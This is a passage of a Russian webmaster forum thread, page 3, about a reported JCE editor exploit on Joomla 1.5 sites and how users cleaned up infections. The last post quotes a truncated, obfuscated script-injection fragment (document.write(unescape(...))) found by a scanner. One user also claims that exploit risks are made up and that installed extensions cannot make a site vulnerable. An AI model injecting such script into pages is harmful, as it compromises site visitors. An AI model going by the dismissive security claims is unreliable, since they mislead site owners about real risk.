Внимание всем владельцам сайтов на Joomla 1.5.x В JCE найден эксплоит.

(Ответов: 32, Просмотров: 9927)
Страница 3 из 4 Первая 1234 Последняя
  1. арбитражу по ночам Аватар для feuer81
    • Регистрация: 30.10.2011
    • Сообщений: 2,102
    • Записей в дневнике: 2
    • Репутация: 464
    • Webmoney BL: ?
    Цитата Сообщение от LoraDi Посмотреть сообщение
    или удалить его!
    удалил и уже не мог редактировать материалы на сайте. Установил обратно...

    А вообще еще не совсем понял - что у меня за зараза на сайте. Только ав Авира ругается когда сайт загружаю
    перечисляет то js/iframe.ad, то js/fakeAD.m

    Пробовал ai-bolit, но в виду своих знаний в программировании, не смог найти траблу... вот теперь ищу ответ профи...
    • 0
  2. Новичок
    • Регистрация: 08.02.2013
    • Сообщений: 6
    • Репутация: 1
    Цитата Сообщение от Павел Joofaq Посмотреть сообщение
    Если руки на месте и голова работает, то можно очень легко обновиться на 2.5. Я сам лично обновлял как свои, так и клиентские сайты до более новой версии без каких-либо проблем. Саму джумлу можно обновить с помощью специального расширения (например, Jupgrade), а для большинства популярных расширений уже давно есть документации или специальные плагины по переносу!

    Я обновлял сайты с virtuemart, K2, ZOO, JoomGallery и ещё многими другими популярными компонентами не используя PHP и другие языки. Так что не стоит спешить с выводами в том, в чем не разбираетесь!
    Не вопрос!!! Возьметесь обновить мой сайт с рукописными модулями??? Заплачу и публично признаю себя идиотом!
    Многие светлые головы не то что обновить, а даже исправить ошибку отображения разделов и статей пытались и смогли.
    З.Ы. За разумную цену, конечно.
    З.З.Ы.Опасность всяких там "эксплоитов" и "взломов" считаю надуманным бредом для новичков.
    • 0
  3. Работаем с Shop-Script Аватар для Павел Joofaq
    • Регистрация: 13.05.2011
    • Сообщений: 914
    • Репутация: 277
    • Webmoney BL: ?
    Цитата Сообщение от Алень Посмотреть сообщение
    Не вопрос!!! Возьметесь обновить мой сайт с рукописными модулями??? Заплачу и публично признаю себя идиотом!
    Многие светлые головы не то что обновить, а даже исправить ошибку отображения разделов и статей пытались и смогли.
    З.Ы. За разумную цену, конечно.
    З.З.Ы.Опасность всяких там "эксплоитов" и "взломов" считаю надуманным бредом для новичков.
    В Вашем предыдущем посте не было ни слова о том, что на сайте есть самописные модули. В таком случае, естественно, придется их переписывать. Но лучше всего обратиться именно к разработчикам, которые Вам эти самые модули писали.
    • 1

    Спасибо сказали:

    LoraDi(09.02.2013),
  4. арбитражу по ночам Аватар для feuer81
    • Регистрация: 30.10.2011
    • Сообщений: 2,102
    • Записей в дневнике: 2
    • Репутация: 464
    • Webmoney BL: ?
    Цитата Сообщение от Павел Joofaq Посмотреть сообщение
    Пришлось удалить данное расширение со всех своих сайтов.
    чем-то заменили?

    Я когда удалил со своего сайта - не мог редактировать имеющиеся материалы, восстановил-вернулась возможность редактировать статьи...
    • 0
  5. Работаем с Shop-Script Аватар для Павел Joofaq
    • Регистрация: 13.05.2011
    • Сообщений: 914
    • Репутация: 277
    • Webmoney BL: ?
    Цитата Сообщение от feuer81 Посмотреть сообщение
    чем-то заменили?

    Я когда удалил со своего сайта - не мог редактировать имеющиеся материалы, восстановил-вернулась возможность редактировать статьи...
    Перед тем, как удалять, нужно изменить редактор по умолчанию на TinyMCE (это стандартный джумловский). Затем в настройках плагина TinyMCE можно сделать его более функциональным.
    • 1

    Спасибо сказали:

    feuer81(10.02.2013),
  6. Опытный Аватар для dik85
    • Регистрация: 25.03.2011
    • Сообщений: 291
    • Репутация: 47
    • Webmoney BL: ?
    Интересно, сайт может быть уязвим если JCE установлен, но по умолчанию стоит и работает TinyMCE ?
    • 0
  7. Дипломник Аватар для LoraDi
    • Регистрация: 16.11.2010
    • Сообщений: 146
    • Репутация: 32
    • Webmoney BL: ?
    dik85, да, а смысл тогда ставить JCE, если Вы работаете со стандартным редактором TinyMCE?
    • 0
  8. Опытный Аватар для dik85
    • Регистрация: 25.03.2011
    • Сообщений: 291
    • Репутация: 47
    • Webmoney BL: ?
    Смысл в том, что мне удобней пользоваться TinyMCE, однако JCE предлогает больше возможностей, среди которых и "медиабокс" для изображений. который я использую лишь когда надо сделать картинку с зумом, и некоторые другие. Но при добавлении простых статей, я использую TinyMCE
    • 0
  9. Новичок
    • Регистрация: 08.02.2013
    • Сообщений: 6
    • Репутация: 1
    Цитата Сообщение от dik85 Посмотреть сообщение
    Интересно, сайт может быть уязвим если JCE установлен, но по умолчанию стоит и работает TinyMCE ?
    Установленный JCE не предполагает "уязвимость" сайта. Уязвимость сайта определяется в первую очередь настройками безопасности, а не вымышленными "уязвимостями".
    • 0
  10. Опытный Аватар для mmi
    • Регистрация: 02.05.2012
    • Сообщений: 332
    • Репутация: 64
    Ребята помогите советом или делом, работу конечно оплачу.
    У меня несколько сайтов на жумле 1.5 и на последнем вордпресе, все заражены похоже через JCE (на жумле он слетел на всех сайтах), на андроиде уходит трафик на какие-то левые ресурсы по скачке файлов.

    Что уже сделал:
    Скопировал все с хостинга и проверил Касперским, нашел и удалил троянскую программу Backdoor.PHP.RemoteAdmin.ag на всех сайтах.
    Потом прогнал сканером на хостинге, нашел много левых файлов с вредоносным кодом с названиями в виде цифр, тоже все поудалял.
    Сканер еще показывает много вот такого текста в разных файлах:
    k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return) ; if($return)
    * * This class uses the Unix `diff` program via shell_exec to compute the * differences between the tw
    a8072",sandybrown:"#f4a460",seagreen:"#2e8b57",sea shell:"#fff5ee",sienna:"#a0522d",skyblue:"#87ceeb" ,slat

    и так далее со словом shell.

    Что делать дальше?

    И вот еще много вот такого:
    inyMCE.addToLang('',{ print_desc : 'Print' }); ;document.write(unescape("%3C%73%63%72%69%70%74%20 %74%79%70%65%3D%22%74%65
    с фразой document.write(unescape
    Последний раз редактировалось mmi; 22.03.2013 в 19:29.
    • 0
Страница 3 из 4 Первая 1234 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Покупка ссылок с новостных сайтов и сайтов "обо всём"
Вопросы от новичков 4 03.10.2012 23:15
Сотрудничество владельцам сетей MFA-сайтов, увеличение доходов от Adsense
Другая работа 19 30.05.2012 00:31
База трастовых сайтов -всем бесплатно
Прочее 15 07.05.2012 12:38
На что обращать внимание при покупке сапо-сайтов
Дайджест блогосферы 0 01.07.2010 11:17

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры